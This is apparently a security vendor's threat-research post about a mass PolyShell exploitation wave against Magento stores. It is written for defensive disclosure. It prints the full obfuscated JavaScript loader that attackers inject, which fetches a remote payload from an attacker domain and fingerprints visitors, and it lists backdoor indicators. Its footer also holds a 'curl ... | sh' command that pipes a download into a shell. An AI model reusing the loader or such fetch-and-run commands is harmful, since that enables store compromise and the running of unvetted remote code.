Mass PolyShell attack wave hits 471 stores in one hour

Mass PolyShell attack wave hits 471 stores in one hour | Sansec 112) { this.ssScrolled = true; } else if (window.pageYOffset Scan your store now Scan your store now Scan your store now! Mass PolyShell attack wave hits 471 stores in one hour by Sansec Forensics Team Published in Threat Research − March 30, 2026 Sansec detected 471 stores compromised in a single hour as attackers exploit the PolyShell vulnerability at scale. The attack injects obfuscated JavaScript from the freshly registered domain lanhd6549tdhse.top. New victims are still coming in every minute. Sansec is tracking a mass exploitation wave of the PolyShell vulnerability that hit hundreds of online stores within a single hour today. The attacks are ongoing: new victims appear every minute. None of the compromised stores are Sansec customers. Sansec Shield has been blocking PolyShell attacks since March 16th. What's being injected After gaining access through PolyShell, attackers inject obfuscated JavaScript into CMS pages and static blocks. The script uses localStorage for persistence and loads an external payload from lanhd6549tdhse.top : < script type = "application/javascript" > ( function ( ){ var id= '136c1e07507f4a97' ; var store= localStorage . getItem (id); if (store){ var e= document . createElement ( 'a' ); e. setAttribute ( 'onclick' , atob (store)); e. click (); localStorage . removeItem (id) } }()); ( function ( ){ var d= document ; var s=d. createElement ( 'script' ); s. src = atob ( 'aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==' ) + encodeURIComponent (d. referrer ) + '&default_keyword=' + encodeURIComponent (d. title ) + '&' + window . location . search . replace ( '?' , '&' ) + '&frm=script' ; if (d. currentScript ){ d. currentScript . parentNode . insertBefore (s, d. currentScript ); } else { d. getElementsByTagName ( 'head' )[ 0 ]. appendChild (s); } }()); The base64 string decodes to https://lanhd6549tdhse.top/KZtBscgb?&se_referrer= . The script fingerprints every visitor by collecting referrer, page title, and query parameters. The domain was registered just four days ago and Sansec is currently the only vendor on VirusTotal that flags it as malicious. The first stage checks localStorage for a previously stored payload (keyed by 136c1e07507f4a97 ). If found, it executes the payload via a synthetic click event and removes it. This lets the attacker persist malicious behavior across page loads without re-fetching from the external server. The attack chain These compromises follow the same pattern Sansec has documented over the past two weeks: Attacker uploads a PHP webshell via the PolyShell vulnerability Webshell drops accesson.php backdoors across multiple directories Attacker injects the JavaScript loader into CMS content The speed of this wave shows that the attackers have fully automated the exploitation chain from initial upload to JavaScript injection. Indicators of compromise Type Value Loader domain lanhd6549tdhse.top Loader URL https://lanhd6549tdhse.top/KZtBscgb localStorage key 136c1e07507f4a97 Backdoor filename accesson.php Backdoor beacon 8194460 (result of 409723*20 ) Use a specialized ecommerce scanner like eComscan to check your store for these and other indicators of compromise. Manual searches only catch known IOCs, while eComscan detects the full range of PolyShell payloads, backdoors, and injected scripts. Recommendations Block attacks : Deploy Sansec Shield to block PolyShell exploitation attempts in real-time Scan for compromise : Run eComscan to detect uploaded webshells, backdoors, and injected JavaScript For full technical details on the PolyShell vulnerability and all known payloads, see our main PolyShell advisory . Read more PolyShell: unrestricted file upload in Magento and Adobe Commerce Novel WebRTC skimmer bypasses security controls at $100+ billion car maker Claude finds 353 zero-days on Packagist SessionReaper attacks have started, 3 in 5 stores still vulnerable SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236) div]:border-ss-grey [&>div]:border-t-2 [&>div]:p-4 [&>div]:shadow-md max-w-[350px] my-0 overflow-clip pb-4 px-8 sticky text-sm top-24"> In this article Protect your store now! Block all known Magento attacks, while you schedule the latest critical patch until a convenient moment. No more downtime and instability from rushed patching. Get Sansec Shield skimming magecart magento adobe-commerce polyshell backdoor Scan your store now for malware & vulnerabilities $ curl ecomscan.com | sh eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more. Learn more Made with ❤ Sansec BV Wolvenplein 25 3512 CK Utrecht The Netherlands [email protected] Sansec Shield Sansec eComscan Pricing Guides Partners About Magecart Malware library Media coverage System status Live attacks Research Browse by Tag Company Contact Login Stay up to date with the latest eCommerce attacks experts in eCommerce security Terms & Conditions • Privacy & Cookie Policy • Company Reg 77165187 • Tax NL860920306B01